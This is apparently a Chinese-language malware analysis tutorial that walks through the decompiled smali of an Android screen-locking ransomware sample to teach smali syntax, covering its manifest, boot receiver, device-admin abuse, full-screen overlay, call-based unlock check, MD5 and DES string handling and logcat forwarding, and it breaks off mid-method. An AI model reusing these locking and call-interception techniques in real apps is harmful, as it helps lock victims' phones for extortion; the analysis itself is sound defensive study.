引言
本次分析的样本是一款比较简单的android锁屏病毒,通过设备管理器来进行锁屏功能,并利用开机广播和服务的结合实现开机锁屏,解锁方式通过电话拨入,对资源文件进行解密出字符串和来电电话进行匹配的方式进行解锁。我们主要是从者一款比较简单的病毒中熟悉一下smali语法。
文件简介
App应用名称: 红包强盗(后台版)md5: F3ADAADC7A8CB0D16A1AD05AADC8B1F2包名: com.cjk。
详细分析
第一步,直接先上模拟器,看看大概是个什么毒。从截图看出它想申请设备管理员权限,然后就弹出锁屏界面,一枚锁品病毒:
看看apk包内的文件,在res\raw
目录下发现四个可疑文本文件,内容是Cj09QU80TVRu
、Cj1rRE0xY3puMllqTTVuVE0=
这些有可能是加密过的字符串,还在res\drawable
目录下,发现下面这个qq二维码,也没什么so文件,也不会加固过。
主要从从AndroidManifest.xml文件中看四大组件,一般样本都会将恶意行为放在服务组件,需要重点关注。
<application android:debuggable="false" android:icon="@drawable/icon" android:label="王者荣耀点卷生成器" android:theme="@style/AppTheme">
<activity android:label="@string/app_name" android:name=".M">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<service android:name="s" />
<receiver android:name="bbb">
<intent-filter android:priority="2147483647">
<action android:name="android.intent.action.BOOT_COMPLETED" />
</intent-filter>
</receiver>
<receiver android:description="@string/hello" android:name=".MyAdmin">
<meta-data android:name="android.app.device_admin" android:resource="@xml/my_admin" />
<intent-filter>
<action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
</intent-filter>
</receiver>
</application>
1)s
服务根据服务生命周期表可以知道,针对两种不同方式启动的服务,调用的方法是不同的,因为下面onbind方法并没有任何操作,如果要开启这个服务只会走startService方法,所以我们顺着onCreate->onStartCommand来看。
//onBind方法,参数为Intent类实例化的对象
.method public onBind(Intent)IBinder
//onBind方法方法中用到了6个寄存器
.registers 6
//注解,就是java中的@Override
.annotation runtime Override
.end annotation
// 将参数p0(this)赋值给变量v0
00000000 move-object v0, p0
//将参数p1(传入的Intent类型参数)赋值给变量v1
00000002 move-object v1, p1
00000004 const/4 v3, 0
//检查v3是否可以转化成IBinder类
00000006 check-cast v3, IBinder
0000000A move-object v0, v3
//返回一个null对象
0000000C return-object v0
.end method
在看oncreate之前,在他的构造方法中,可以看见有几个敏感的数据,QQ号
,暱称
,并且将这串字符串进行静态方法MD5Util->getMD5String的处理,下面主要看看这个处理过程。
.method public constructor <init>()V
.registers 5
00000000 move-object v0, p0
00000002 move-object v2, v0
//直接调用Service的构造方法super(),(这种调用不存在被覆盖,编译时静态确认)
00000004 invoke-direct Service-><init>()V, v2
0000000A move-object v2, v0
0000000C const-string v3, "by:彼岸花 qq:127****738"
//将v3的字符串存放在v2中,并且v2=s->bahk:String(this.bahk)
00000010 iput-object v3, v2, s->bahk:String
//使用this清空v2,v3
00000014 move-object v2, v0
00000016 move-object v3, v0
//获取s->bahk:String的值放入v3,然后让s->bahk:String指向v3
00000018 iget-object v3, v3, s->bahk:String
//调用静态方法(不需要对象,所以少一个参数),看名称应该是获取md5字符串
0000001C invoke-static MD5Util->getMD5String(String)String, v3
00000022 move-result-object v3
//最后让经过处理的字符串v3放入this.Lycorisradiata
00000024 iput-object v3, v2, s->Lycorisradiata:String
00000028 return-void
.end method
处理函数getMD5String,它将字符串by:彼岸花 qq:127****738
,先进行了md5摘要计算,得到一个第一次加密过的字节数组,然后在new一个长度是其2倍的char型数组,接着第一次加密过的字节数组的每一个字节经过2次加密,生成不同的字符,填入到new出来的char型数组中,最终将其转化成字符串返回。
.method public static final getMD5String(String)String
.registers 19
//静态方法,没有引用对象,所以p0=参数String
00000000 move-object/from16 v0, p0
//v12 = char[16] 创建16长度的char型数组,将其赋给v12
00000004 const/16 v12, 0x0010
00000008 new-array v12, v12, [C
//将EC指向的2字节长度的char数据填入数组
0000000C fill-array-data v12, :EC
//v2 = char[16] ,v12=this,将数组赋给v2,用this清空v12
00000012 move-object v2, v12 # v2 = charArray1 = new char[]{'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'}
00000014 move-object v12, v0
:16
//v12.getBytes()将字符串转化成字节数组,调用虚方法,也就是v12是被引用的对象
//然后使用MD5信息摘要算法对这个字节数组进行计算,将hash值在00000040地址赋给v12
00000016 invoke-virtual String->getBytes()[B, v12
0000001C move-result-object v12
0000001E move-object v3, v12
00000020 const-string v12, "MD5"
00000024 invoke-static MessageDigest->getInstance(String)MessageDigest, v12
0000002A move-result-object v12
//因为v12(信息摘要对象)在00000032 位置做被引用的参数对象,所以将其赋给v4来接收update方法更改后的摘要对象
0000002C move-object v4, v12
0000002E move-object v12, v4
00000030 move-object v13, v3
00000032 invoke-virtual MessageDigest->update([B)V, v12, v13
00000038 move-object v12, v4
0000003A invoke-virtual MessageDigest->digest()[B, v12
00000040 move-result-object v12
00000042 move-object v5, v12 # v5 = md5ByteArray 字节数组类型的信息摘要
00000044 move-object v12, v5
//带有信息摘要的字节数组长度赋给v12,然后将这个长度乘以2,利用这个长度再实例化一个char型数组给v7
00000046 array-length v12, v12
00000048 move v6, v12
0000004A move v12, v6 # v6 = len_of_md5ByteArray
0000004C const/4 v13, 2
0000004E mul-int/lit8 v12, v12, 2
00000052 new-array v12, v12, [C
00000056 move-object v7, v12 # v7 = charArray2 = new char[2 * len_of_md5ByteArray]
00000058 const/4 v12, 0
0000005A move v8, v12 # v8 = 0
0000005C const/4 v12, 0
0000005E move v9, v12
:60
//v12=v9=0,v13=v6=md5字节数组的长度
//如果v12<v13跳转到:84,紧跟着下面有个goto :60跳转回来,构成了一个for循环
00000060 move v12, v9
00000062 move v13, v6
00000064 if-lt v12, v13, :84 # for(int v9=0; v9<v6; v9++)
:68
00000068 new-instance v12, String # v12 = v17 = new String()
0000006C move-object/from16 v17, v12
00000070 move-object/from16 v12, v17
00000074 move-object/from16 v13, v17
00000078 move-object v14, v7
0000007A invoke-direct String-><init>([C)V, v13, v14 # v12 = v13 = new String(charArray2)
00000080 move-object v0, v12
:82
00000082 return-object v0
:84
00000084 move-object v12, v5
00000086 move v13, v9
00000088 aget-byte v12, v12, v13
0000008C move v10, v12 # v10 = md5ByteArray[v9]
0000008E move-object v12, v7 # v12 = v7 = charArray2
00000090 move v13, v8 # v13 = v8
00000092 add-int/lit8 v8, v8, 1 # ++v8
00000096 move-object v14, v2 # v2 = charArray1
00000098 move v15, v10
0000009A const/16 v16, 4
0000009E ushr-int/lit8 v15, v15, 4
000000A2 const/16 v16, 15
000000A6 and-int/lit8 v15, v15, 15
000000AA aget-char v14, v14, v15
000000AE aput-char v14, v12, v13 # charArray2[v13] = charArray1[md5ByteArray[v9] >> 4 & 15]
000000B2 move-object v12, v7
000000B4 move v13, v8 # v13 = v8
000000B6 add-int/lit8 v8, v8, 1 # ++v8
000000BA move-object v14, v2
000000BC move v15, v10
000000BE const/16 v16, 15
000000C2 and-int/lit8 v15, v15, 15
000000C6 aget-char v14, v14, v15
000000CA aput-char v14, v12, v13 # charArray2[v13] = charArray1[md5ByteArray[v9] & 15]
:CE
000000CE add-int/lit8 v9, v9, 1
000000D2 goto :60
:D4
000000D4 move-exception v12
000000D6 move-object v3, v12
000000D8 move-object v12, v3
000000DA invoke-virtual Exception->printStackTrace()V, v12
000000E0 const/4 v12, 0
000000E2 check-cast v12, String
000000E6 move-object v0, v12
000000E8 goto :82
.catch Exception {:16 .. :CE} :D4
:EC
000000EC .array-data 2 x 0x10
0x30
0x31
0x32
0x33
0x34
0x35
0x36
0x37
0x38
0x39
0x41
0x42
0x43
0x44
0x45
0x46
.end array-data
.end method
这里将注释集合起来,大概是这样的加密过程,这里主要是大致预览加密逻辑。
charArray1 = new char[]{'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'}
string = "by:彼岸花 qq:1279525738";
byte[] v3 = string.getBytes();
MessageDigest v4 = MessageDigest.getInstance("MD5");
v4.update(v3);
byte[] v5 = md5ByteArray = v4.digest() //字节数组类型的信息摘要
v6 = md5ByteArray.length()
v7 = charArray2 = new char[2 * v6]
for(int v9=0; v9<v6; v9++){
v10 = md5ByteArray[v9]
v12 = v7 = charArray2
v13 = v8
++v8
v2 = charArray1
//对单个字节的第一次加密
v7[v13] = charArray2[v13] = charArray1[md5ByteArray[v9] >> 4 & 15]
v13 = v8
++v8
//对单个字节的第二次加密
v7[v13] = charArray2[v13] = charArray1[md5ByteArray[v9] & 15]
}
v12 = new String(charArray2)
return v12
然后接着分析s
服务的oncreate方法,先打印日志并通过Intent使用广播发送出去,让包名为com.aide.ui
的接收,这里动态注册了一个监听接收短信、电话状态的广播,如果有电话拨进来,会将来电电话号码和经过字符串处理的hm资源文件里的字符串进行比较,如果相等就结束前台呼叫、移除newone布局,设置铃声静音,停止服务s
(很明显是解锁方法),如果不相等则会拦截下这条广播。然后又用bah.java
、8e6762e8737463a957dc390bff4eb8e8
两个字符串生成对应的DES加密、解密对象,还有实例化一个by:彼岸花 qq:1279525738.xml
存储文件的编辑器对象,但是都没有后面的操作,最后执行了重复手机震动操作,每过0.1s震动1.5s。
.method public onCreate()V
.registers 15
.annotation system Signature
value = {
"()V"
}
.end annotation
.annotation runtime Override
.end annotation
00000000 move-object v0, p0 # v0 = this
00000002 move-object v7, v0
00000004 const-string v8, "com.aide.ui"
00000008 invoke-static ADRTLogCatReader->onContext(Context, String)V, v7, v8 # ADRTLogCatReader.onContext(this, "com.aide.ui")
0000000E move-object v7, v0
00000010 invoke-super Service->onCreate()V, v7 # this.Service.onCreate()
00000016 move-object v7, v0
00000018 new-instance v8, s$IncomingCallReceiver # 实例化一个IncomingCallReceiver对象
0000001C move-object v13, v8
0000001E move-object v8, v13
00000020 move-object v9, v13
00000022 move-object v10, v0
00000024 invoke-direct s$IncomingCallReceiver-><init>(s)V, v9, v10 # 调用incomingCallReceiver的构造方法进行初始化: new IncomingCallReceiver(this)
0000002A iput-object v8, v7, s->mReceiver:s$IncomingCallReceiver # this.mReceiver = incomingCallReceiver
0000002E new-instance v7, IntentFilter
00000032 move-object v13, v7
00000034 move-object v7, v13
00000036 move-object v8, v13
00000038 invoke-direct IntentFilter-><init>()V, v8 # IntentFilter intentfilter = new IntentFilter()
0000003E move-object v2, v7
00000040 move-object v7, v2
00000042 const-string v8, "android.intent.action.PHONE_STATE"
00000046 invoke-virtual IntentFilter->addAction(String)V, v7, v8
0000004C move-object v7, v2
0000004E const-string v8, "android.provider.Telephony.SMS_RECEIVED"
00000052 invoke-virtual IntentFilter->addAction(String)V, v7, v8
00000058 move-object v7, v0
0000005A move-object v8, v0
0000005C iget-object v8, v8, s->mReceiver:s$IncomingCallReceiver
00000060 move-object v9, v2
00000062 invoke-virtual s->registerReceiver(BroadcastReceiver, IntentFilter)Intent, v7, v8, v9 # this.registerReceiver(this.mReceiver, intentfilter)
00000068 move-result-object v7
0000006A move-object v7, v0
0000006C move-object v8, v0
0000006E const-string v9, "audio"
00000072 invoke-virtual s->getSystemService(String)Object, v8, v9
00000078 move-result-object v8
0000007A check-cast v8, AudioManager
0000007E iput-object v8, v7, s->mAudioManager:AudioManager # this.mAudioManager = this.getSystemService("audio")
00000082 move-object v7, v0
00000084 const-string v8, "phone"
00000088 invoke-virtual s->getSystemService(String)Object, v7, v8
0000008E move-result-object v7
00000090 check-cast v7, TelephonyManager
00000094 move-object v3, v7
:96
00000096 const-string v7, "android.telephony.TelephonyManager"
0000009A invoke-static Class->forName(String)Class, v7
:A0
000000A0 move-result-object v7
:A2
000000A2 const-string v8, "getITelephony"
000000A6 const/4 v9, 0
000000A8 check-cast v9, [Class
000000AC invoke-virtual Class->getDeclaredMethod(String, [Class)Method, v7, v8, v9 # Method v4 = Class.forName("android.telephony.TelephonyManager").getDeclaredMethod("getITelephony", 0)
000000B2 move-result-object v7
000000B4 move-object v4, v7
000000B6 move-object v7, v4
000000B8 const/4 v8, 1
000000BA invoke-virtual Method->setAccessible(Z)V, v7, v8 # v4.setAccessible(1)关闭安全检查
000000C0 move-object v7, v0
000000C2 move-object v8, v4
000000C4 move-object v9, v3
000000C6 const/4 v10, 0
000000C8 check-cast v10, [Object
000000CC invoke-virtual Method->invoke(Object, [Object)Object, v8, v9, v10 # v4.invoke(telephoneManager, 0)
000000D2 move-result-object v8
000000D4 check-cast v8, ITelephony
000000D8 iput-object v8, v7, s->iTelephony:ITelephony # this.iTelephony = v4.invoke(telephoneManager, 0)
:DC
000000DC move-object v7, v0
000000DE new-instance v8, DU
000000E2 move-object v13, v8
000000E4 move-object v8, v13
000000E6 move-object v9, v13
000000E8 const-string v10, "bah.java"
000000EC invoke-direct DU-><init>(String)V, v9, v10
000000F2 iput-object v8, v7, s->des:DU # s.des = new DU("bah.java")
000000F6 move-object v7, v0
:F8
000000F8 new-instance v8, DU
000000FC move-object v13, v8
000000FE move-object v8, v13
00000100 move-object v9, v13
00000102 move-object v10, v0
00000104 iget-object v10, v10, s->des:DU
00000108 const-string v11, "8e6762e8737463a957dc390bff4eb8e8"
0000010C invoke-virtual DU->decrypt(String)String, v10, v11
00000112 move-result-object v10
00000114 invoke-direct DU-><init>(String)V, v9, v10
0000011A iput-object v8, v7, s->des:DU # s.des = new DU(s.des.decrypt("8e6762e8737463a957dc390bff4eb8e8"))
:11E
0000011E move-object v7, v0
00000120 move-object v8, v0
00000122 move-object v9, v0
00000124 iget-object v9, v9, s->bahk:String
00000128 const/4 v10, 0
0000012A invoke-virtual s->getSharedPreferences(String, I)SharedPreferences, v8, v9, v10
00000130 move-result-object v8
00000132 iput-object v8, v7, s->share:SharedPreferences # this.share = this.getSharedPreferences("by:彼岸花 qq:1279525738", 0)
00000136 move-object v7, v0
00000138 move-object v8, v0
0000013A iget-object v8, v8, s->share:SharedPreferences
0000013E invoke-interface SharedPreferences->edit()SharedPreferences$Editor, v8
00000144 move-result-object v8
00000146 iput-object v8, v7, s->editor:SharedPreferences$Editor # this.editor = this.share.edit()
0000014A move-object v7, v0
0000014C invoke-virtual s->getApplication()Application, v7
00000152 move-result-object v7
00000154 const-string v8, "vibrator"
00000158 invoke-virtual Application->getSystemService(String)Object, v7, v8 # this.getApplication().getSystemService("vibrator")
0000015E move-result-object v7
00000160 check-cast v7, Vibrator
00000164 move-object v4, v7
00000166 move-object v7, v4
00000168 const/4 v8, 4
0000016A new-array v8, v8, [J # long[] longArray = new long[4]
0000016E move-object v13, v8
00000170 move-object v8, v13
00000172 move-object v9, v13
00000174 const/4 v10, 0
00000176 const/16 v11, 100 # (long)100
0000017A int-to-long v11, v11
0000017C aput-wide v11, v9, v10 # longArray[0] = (long)100
00000180 move-object v13, v8
00000182 move-object v8, v13
00000184 move-object v9, v13
00000186 const/4 v10, 1
00000188 const/16 v11, 1500
0000018C int-to-long v11, v11
0000018E aput-wide v11, v9, v10
00000192 move-object v13, v8
00000194 move-object v8, v13
00000196 move-object v9, v13
00000198 const/4 v10, 2
0000019A const/16 v11, 100
0000019E int-to-long v11, v11
000001A0 aput-wide v11, v9, v10
000001A4 move-object v13, v8
000001A6 move-object v8, v13
000001A8 move-object v9, v13
000001AA const/4 v10, 3
000001AC const/16 v11, 1500
000001B0 int-to-long v11, v11
000001B2 aput-wide v11, v9, v10 # longArray = new long[]{(long)100, (long)1500, (long)100, (long)1500}
000001B6 const/4 v9, 0
000001B8 invoke-virtual Vibrator->vibrate([J, I)V, v7, v8, v9 # this.getApplication().getSystemService("vibrator").vibrate(longArray, 0)
000001BE return-void
:1C0
000001C0 move-exception v7
000001C2 move-object v5, v7
:1C4
000001C4 new-instance v7, NoClassDefFoundError
000001C8 move-object v13, v7
000001CA move-object v7, v13
000001CC move-object v8, v13
000001CE move-object v9, v5
000001D0 invoke-virtual Throwable->getMessage()String, v9
000001D6 move-result-object v9
000001D8 invoke-direct NoClassDefFoundError-><init>(String)V, v8, v9
000001DE throw v7
:1E0
000001E0 move-exception v7
000001E2 move-object v4, v7
000001E4 goto/16 :DC
:1E8
000001E8 move-exception v7
000001EA move-object v4, v7
000001EC goto :11E
.catch ClassNotFoundException {:96 .. :A0} :1C0
.catch Exception {:96 .. :A0} :1E0
.catch Exception {:A2 .. :DC} :1E0
.catch Exception {:F8 .. :11E} :1E8
.catch Exception {:1C4 .. :1E0} :1E01
.end method
ADRTLogCatReader.onContext方法调用onContext静态方法,检查本引用是否可以调试,如果不可以则该方法返回为空,如果可以调试,先初始化ADRTSender的一些静态属性,然后开启一个线程,执行logcat -v threadtime
打印日志,然后每次读取20个字符,并且每次读取一行,将其作为数据参数放入intent里,通过广播发送出去,指定接收包名是”com.aide.ui”,action是”com.adrt.LOGCAT_ENTRIES”。
.method public static onContext(Context, String)V
.registers 12
00000000 move-object v0, p0
00000002 move-object v1, p1
00000004 sget-object v5, ADRTLogCatReader->context:Context # v5 = ADRTLogCatReader.context
00000008 if-eqz v5, :E # if ADRTLogCatReader.context == null{return null;}这个方法onContext只能调用一次
:C
0000000C return-void
:E
0000000E move-object v5, v0
00000010 invoke-virtual Context->getApplicationContext()Context, v5
00000016 move-result-object v5
00000018 sput-object v5, ADRTLogCatReader->context:Context # ADRTLogCatReader.context = this.getApplicationContext()
0000001C const/4 v5, 0
0000001E move-object v6, v0
00000020 invoke-virtual Context->getApplicationInfo()ApplicationInfo, v6
00000026 move-result-object v6
00000028 iget v6, v6, ApplicationInfo->flags:I
0000002C const/4 v7, 2
0000002E and-int/lit8 v6, v6, 2
00000032 if-eq v5, v6, :42 # if(this.ApplicationInfo.flag & 2 == 0){return null;}检查应用是否允许调试
:36
00000036 const/4 v5, 1
:38
00000038 move v2, v5
0000003A move v5, v2
0000003C if-nez v5, :46
:40
00000040 goto :C
:42
00000042 const/4 v5, 0
00000044 goto :38
:46
00000046 move-object v5, v0
:48
00000048 invoke-virtual Context->getPackageManager()PackageManager, v5
0000004E move-result-object v5
00000050 move-object v3, v5
00000052 move-object v5, v3
00000054 move-object v6, v1
00000056 const/16 v7, 0x0080
0000005A invoke-virtual PackageManager->getPackageInfo(String, I)PackageInfo, v5, v6, v7 # this.getPackageManager().getPackageInfo("com.aide.ui", 0x0080)
# 这里获取"com.aide.ui"包应用的META信息,但是后面没有再调用了这个的数据
:60
00000060 move-result-object v5
00000062 move-object v4, v5
00000064 sget-object v5, ADRTLogCatReader->context:Context
00000068 move-object v6, v1
0000006A invoke-static ADRTSender->onContext(Context, String)V, v5, v6 # ADRTSender.onContext(ADRTLogCatReader.context, "com.aide.ui")
00000070 new-instance v5, Thread # Thread thread;
00000074 move-object v9, v5
00000076 move-object v5, v9
00000078 move-object v6, v9
0000007A new-instance v7, ADRTLogCatReader # ADRTLogCatReader aDRTLogCatReader;
0000007E move-object v9, v7
00000080 move-object v7, v9
00000082 move-object v8, v9
00000084 invoke-direct ADRTLogCatReader-><init>()V, v8 # aDRTLogCatReader = new ADRTLogCatReader()
0000008A const-string v8, "LogCat"
0000008E invoke-direct Thread-><init>(Runnable, String)V, v6, v7, v8 # thread(aDRTLogCatReader, "LogCat")
00000094 move-object v3, v5
00000096 move-object v5, v3
00000098 invoke-virtual Thread->start()V, v5 # thread(aDRTLogCatReader, "LogCat").start()
0000009E goto :C
:A0
000000A0 move-exception v5
000000A2 move-object v3, v5
000000A4 goto :C
.catch PackageManager$NameNotFoundException {:48 .. :60} :A0
.end method
.method public run()V
.registers 11
00000000 move-object v0, p0
:2
00000002 invoke-static Runtime->getRuntime()Runtime
00000008 move-result-object v4
0000000A const-string v5, "logcat -v threadtime"
0000000E invoke-virtual Runtime->exec(String)Process, v4, v5 # Process pc = Runtime.getRuntime().exec("logcat -v threadtime")
00000014 move-result-object v4
00000016 move-object v1, v4
00000018 new-instance v4, BufferedReader # BufferedReader br;
0000001C move-object v9, v4
0000001E move-object v4, v9
00000020 move-object v5, v9
00000022 new-instance v6, InputStreamReader # InputStreamReader is;
00000026 move-object v9, v6
00000028 move-object v6, v9
0000002A move-object v7, v9
0000002C move-object v8, v1
0000002E invoke-virtual Process->getInputStream()InputStream, v8 # pc.getInputStream()
00000034 move-result-object v8
00000036 invoke-direct InputStreamReader-><init>(InputStream)V, v7, v8 # is = new InputStreamReader(pc.getInputStream)
0000003C const/16 v7, 20
00000040 invoke-direct BufferedReader-><init>(Reader, I)V, v5, v6, v7 # br = new BufferedReader(new InputStreamReader(pc.getInputStream), 20)
00000046 move-object v2, v4
00000048 const-string v4, ""
0000004C move-object v3, v4
:4E
0000004E move-object v4, v2
00000050 invoke-virtual BufferedReader->readLine()String, v4 # br.readLine()
00000056 move-result-object v4
00000058 move-object v9, v4
0000005A move-object v4, v9
0000005C move-object v5, v9
0000005E move-object v3, v5
00000060 if-eqz v4, :80
:64
00000064 const/4 v4, 1
00000066 new-array v4, v4, [String # String[] st = new String[1];
0000006A move-object v9, v4
0000006C move-object v4, v9
0000006E move-object v5, v9
00000070 const/4 v6, 0
00000072 move-object v7, v3
00000074 aput-object v7, v5, v6 # st[0] = br.readLine()
00000078 invoke-static ADRTSender->sendLogcatLines([String)V, v4 # ADRTSender.sendLogcatLines(st)
:7E
0000007E goto :4E
:80
00000080 return-void
:82
00000082 move-exception v4
00000084 move-object v1, v4
00000086 goto :80
.catch IOException {:2 .. :7E} :82
.end method
接着分析:onstart方法(android-15之后就被onStartCommand代替了)主要执行了方法c
,主要是将处理好的字符串附加到layout/newone.xml
文件内的几个TextView控件上。
0000000C invoke-super Service->onStart(Intent, I)V, v4, v5, v6 # this.super(v1, v2)
00000012 move-object v4, v0
00000014 invoke-direct s->c()V, v4 # this.c()
.method private c()V
.registers 21
.annotation system Signature
value = {
"()V"
}
.end annotation
00000000 move-object/from16 v1, p0
00000004 move-object v15, v1
00000006 new-instance v16, WindowManager$LayoutParams
0000000A move-object/from16 v19, v16
0000000E move-object/from16 v16, v19
00000012 move-object/from16 v17, v19
00000016 invoke-direct/range WindowManager$LayoutParams-><init>()V, v17 .. v17
0000001C move-object/from16 v0, v16
00000020 iput-object v0, v15, s->wmParams:WindowManager$LayoutParams # this.wmParams = new WindowManager$LayoutParams()
00000024 move-object v15, v1
00000026 move-object/from16 v16, v1
0000002A invoke-virtual/range s->getApplication()Application, v16 .. v16
00000030 move-result-object v16
00000032 move-object/from16 v17, v1
00000036 invoke-virtual/range s->getApplication()Application, v17 .. v17
0000003C move-result-object v17
0000003E sget-object v17, Context->WINDOW_SERVICE:String
00000042 invoke-virtual/range Application->getSystemService(String)Object, v16 .. v17
00000048 move-result-object v16
0000004A check-cast v16, WindowManager
0000004E move-object/from16 v0, v16
00000052 iput-object v0, v15, s->mWindowManager:WindowManager # mWindowManager = this.getApplication().getsystemService(CONTEXT.WINDOW_SERVICE)
00000056 move-object v15, v1
00000058 iget-object v15, v15, s->wmParams:WindowManager$LayoutParams # this.wmParams
0000005C const/16 v16, 2010
00000060 move/from16 v0, v16
00000064 iput v0, v15, WindowManager$LayoutParams->type:I # this.wmParams.type = 2010
00000068 move-object v15, v1
0000006A iget-object v15, v15, s->wmParams:WindowManager$LayoutParams
0000006E const/16 v16, 1
00000072 move/from16 v0, v16
00000076 iput v0, v15, WindowManager$LayoutParams->format:I # this.wmParams.format = 1
0000007A move-object v15, v1
0000007C iget-object v15, v15, s->wmParams:WindowManager$LayoutParams
00000080 const/16 v16, 0x0500
00000084 move/from16 v0, v16
00000088 iput v0, v15, WindowManager$LayoutParams->flags:I # this.wmParams.flags = 0x0500
0000008C move-object v15, v1
0000008E iget-object v15, v15, s->wmParams:WindowManager$LayoutParams
00000092 const/16 v16, 49
00000096 move/from16 v0, v16
0000009A iput v0, v15, WindowManager$LayoutParams->gravity:I # this.wmParams.gravity = 49
0000009E move-object v15, v1
000000A0 iget-object v15, v15, s->wmParams:WindowManager$LayoutParams
000000A4 const/16 v16, 0
000000A8 move/from16 v0, v16
000000AC iput v0, v15, WindowManager$LayoutParams->x:I # this.wmParams.x = 0
000000B0 move-object v15, v1
000000B2 iget-object v15, v15, s->wmParams:WindowManager$LayoutParams
000000B6 const/16 v16, 0
000000BA move/from16 v0, v16
000000BE iput v0, v15, WindowManager$LayoutParams->y:I # this.wmParams.y = 0
000000C2 move-object v15, v1
000000C4 iget-object v15, v15, s->wmParams:WindowManager$LayoutParams
000000C8 const/16 v16, -0x0001
000000CC move/from16 v0, v16
000000D0 iput v0, v15, ViewGroup$LayoutParams->width:I # this.wmParams.width=0x0001
000000D4 move-object v15, v1
000000D6 iget-object v15, v15, s->wmParams:WindowManager$LayoutParams
000000DA const/16 v16, -0x0001
000000DE move/from16 v0, v16
000000E2 iput v0, v15, ViewGroup$LayoutParams->height:I # this.wmParams.height = -0x0001
000000E6 move-object v15, v1
000000E8 invoke-virtual s->getApplication()Application, v15
000000EE move-result-object v15
000000F0 invoke-static LayoutInflater->from(Context)LayoutInflater, v15
000000F6 move-result-object v15
000000F8 move-object v3, v15
000000FA move-object v15, v1
000000FC move-object/from16 v16, v3
00000100 const v17, 0x7F030001
00000106 const/16 v18, 0
0000010A check-cast v18, ViewGroup
0000010E invoke-virtual/range LayoutInflater->inflate(I, ViewGroup)View, v16 .. v18
00000114 move-result-object v16
00000116 move-object/from16 v0, v16
0000011A iput-object v0, v15, s->mFloatLayout:View # this.mFloatLayout = LayoutInflater.from(this.getApplication).inflate(0x7F030001, 0)
0000011E move-object v15, v1
00000120 iget-object v15, v15, s->mWindowManager:WindowManager
00000124 move-object/from16 v16, v1
00000128 move-object/from16 v0, v16
0000012C iget-object v0, v0, s->mFloatLayout:View
00000130 move-object/from16 v16, v0
00000134 move-object/from16 v17, v1
00000138 move-object/from16 v0, v17
0000013C iget-object v0, v0, s->wmParams:WindowManager$LayoutParams
00000140 move-object/from16 v17, v0
00000144 invoke-interface/range WindowManager->addView(View, ViewGroup$LayoutParams)V, v15 .. v17 # this.mWindowManager.addView(this.mFloatLayout, this.wmParams)
0000014A move-object v15, v1
0000014C move-object/from16 v16, v1
00000150 move-object/from16 v0, v16
00000154 iget-object v0, v0, s->mFloatLayout:View
00000158 move-object/from16 v16, v0
0000015C const/high16 v17, 0x7F0A0000
00000160 invoke-virtual/range View->findViewById(I)View, v16 .. v17
00000166 move-result-object v16
00000168 check-cast v16, TextView
0000016C move-object/from16 v0, v16
00000170 iput-object v0, v15, s->wb:TextView # this.wb = mFloatLayout.findViewById(0x7F0A0000)
00000174 move-object v15, v1
00000176 move-object/from16 v16, v1
0000017A move-object/from16 v0, v16
0000017E iget-object v0, v0, s->mFloatLayout:View
00000182 move-object/from16 v16, v0
00000186 const v17, 0x7F0A0001
0000018C invoke-virtual/range View->findViewById(I)View, v16 .. v17
00000192 move-result-object v16
00000194 check-cast v16, TextView
00000198 move-object/from16 v0, v16
0000019C iput-object v0, v15, s->bah:TextView
000001A0 move-object v15, v1
000001A2 move-object/from16 v16, v1
000001A6 move-object/from16 v0, v16
000001AA iget-object v0, v0, s->mFloatLayout:View
000001AE move-object/from16 v16, v0
000001B2 const v17, 0x7F0A0002
000001B8 invoke-virtual/range View->findViewById(I)View, v16 .. v17
000001BE move-result-object v16
000001C0 check-cast v16, TextView
000001C4 move-object/from16 v0, v16
000001C8 iput-object v0, v15, s->cjk:TextView
000001CC move-object v15, v1
000001CE move-object/from16 v16, v1
000001D2 move-object/from16 v0, v16
000001D6 iget-object v0, v0, s->mFloatLayout:View
000001DA move-object/from16 v16, v0
000001DE const v17, 0x7F0A0003
000001E4 invoke-virtual/range View->findViewById(I)View, v16 .. v17
000001EA move-result-object v16
000001EC check-cast v16, TextView
000001F0 move-object/from16 v0, v16
000001F4 iput-object v0, v15, s->tv:TextView
:1F8
000001F8 new-instance v15, StringBuffer
000001FC move-object/from16 v19, v15
00000200 move-object/from16 v15, v19
00000204 move-object/from16 v16, v19
00000208 invoke-direct/range StringBuffer-><init>()V, v16 .. v16 # stringbuffer = new StringBuffer()
0000020E move-object/from16 v16, v1
00000212 move-object/from16 v0, v16
00000216 iget-object v0, v0, s->Lycorisradiata:String # this.Lycorisradiata
0000021A move-object/from16 v16, v0
0000021E invoke-virtual/range StringBuffer->append(String)StringBuffer, v15 .. v16 # stringbuffer.append(this.Lycorisradiata)
00000224 move-result-object v15
00000226 const-string v16, "626fcaf7df0278de9aff3aaca97a5b8c88fd66ed54f277cc91852adc95565ff06a5cfa22ea1bf0c0fae034132b8a4d212ba95bad14ad34cb812d751d9e47c41df05c9fffa333772bcd5089b13e5600c8fd9587ce8f403c4d5b8156d4d24c94bfd4ed91fb50e3c6a89f070393ab0a03f3"
0000022A invoke-virtual/range StringBuffer->append(String)StringBuffer, v15 .. v16 # stringbuffer.append(v16)
00000230 move-result-object v15
00000232 invoke-virtual StringBuffer->toString()String, v15
00000238 move-result-object v15
0000023A move-object v4, v15
0000023C new-instance v15, StringBuffer
00000240 move-object/from16 v19, v15
00000244 move-object/from16 v15, v19
00000248 move-object/from16 v16, v19
0000024C invoke-direct/range StringBuffer-><init>()V, v16 .. v16 # stringbuffer2 = new StringBuffer()
00000252 move-object/from16 v16, v1
00000256 move-object/from16 v0, v16
0000025A iget-object v0, v0, s->Lycorisradiata:String
0000025E move-object/from16 v16, v0
00000262 invoke-virtual/range StringBuffer->append(String)StringBuffer, v15 .. v16 # stringbuffer2.append(this.Lycorisradiata)
00000268 move-result-object v15
0000026A const-string v16, "60ee210a612f306f774a08a5a865c657ead0311698369b26d95e1c6151b5ee326053086a53edd02dafd2ceff8b6797ceeb75bdd4821b3eb747f256bb22696f8854ba778baee912cbc74042d306579e70cf0965d9cb30c048"
0000026E invoke-virtual/range StringBuffer->append(String)StringBuffer, v15 .. v16 # stringbuffer2.append(v16)
00000274 move-result-object v15
00000276 invoke-virtual StringBuffer->toString()String, v15
0000027C move-result-object v15
0000027E move-object v5, v15
